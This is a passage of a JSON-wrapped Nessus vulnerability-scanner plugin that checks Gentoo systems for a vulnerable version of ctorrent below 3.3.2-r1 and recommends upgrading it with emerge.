# emerge --ask --oneshot --verbose '>=net-p2p/ctorrent-3.3.2-r1'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(119);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:ctorrent\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/11/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/11/21\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"net-p2p/ctorrent\", unaffected:make_list(\"ge 3.3.2-r1\"), vulnerable:make_list(\"lt 3.3.2-r1\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"CTorrent\");\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}]}